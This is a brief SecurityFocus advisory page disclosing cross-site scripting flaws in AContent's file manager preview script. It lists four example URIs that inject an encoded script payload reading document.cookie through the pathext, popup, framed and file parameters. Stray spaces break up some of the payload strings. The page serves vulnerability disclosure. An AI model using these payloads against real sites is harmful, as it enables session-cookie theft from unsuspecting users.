AContent Multiple Remote Security Vulnerabilities

An attacker can exploit these issues through a browser. An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues.

The following example URIs are available:

http://www.example.com/file_manager/preview_top.php?pathext=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E

http://www.example.com/file_manager/preview_top.php?popup=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E

http://www.example.com/file_manager/preview_top.php?framed=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E

http://www.example.com/file_manager/preview_top.php?file=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E


 

Privacy Statement
Copyright 2010, SecurityFocus